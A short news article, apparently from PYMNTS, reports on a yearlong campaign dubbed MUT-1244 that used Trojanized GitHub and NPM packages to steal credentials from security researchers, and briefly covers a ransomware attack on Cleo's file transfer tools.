Yearlong Cyberattack Targets Security Workers
The year of the cyberattack is apparently not going to end quietly.
For example, a report Friday (Dec. 13) by Ars Technica deals with a yearlong attack that has been stealing login credentials from both “malicious and benevolent” security personnel by infecting them with Trojanized versions of open source GitHub and NPM software.
According to the report, this campaign has been reported by security firms Checkmarx and Datadog Security Labs, with hackers infecting the devices of researchers in the security and other technical fields.
The hackers have yet to be identified, the report added, though researchers at Datadog have dubbed them MUT-1244. (MUT is short for “mysterious unattributed threat.”)
These hackers, the report said, install a professionally developed backdoor that takes care to mask its presence. They’ve also used spear phishing campaigns aimed at thousands of researchers who publish papers on the arXiv platform.
According to the report, the hackers seem to have more than one goal. One is collecting SSH private keys, Amazon Web Services access keys, command histories, and other sensitive information from infected devices.
At the time Ars Technica published its report, dozens of machines were still infected, with one Dropbox account offering 390,000 credentials for WordPress websites taken by the hackers. The malware involved in the attacks also installs cryptomining software that was found on at least 68 machines as of last month, the report said.
These attacks are part of a wave of similar incidents at companies in a range of different sectors this year. For example, PYMNTS wrote last week about a ransomware attack on Cleo’s LexiCom, VLTransfer and Harmony enterprise file transfer tools, underscoring the urgent need to secure important business infrastructure that handles sensitive data.
“Critical business infrastructure, especially the many elements of it exposed to the internet, are attractive targets for attackers,” that report said. “That makes prevention and a multifaceted defense critical. By understanding the vulnerabilities of enterprise software tools and implementing security measures, businesses protect their data and mitigate the risks associated with data breaches.”
Several factors were at work in the Cleo incident. For one, enterprise file transfer tools often have extensive permissions and access rights that span networks. Beyond that, these systems usually handle large volumes of sensitive data, making them prime targets for extortion attempts. And finally, many organizations depend on legacy file transfer infrastructure that may not get security updates on a regular basis.
The post Yearlong Cyberattack Targets Security Workers appeared first on PYMNTS.com.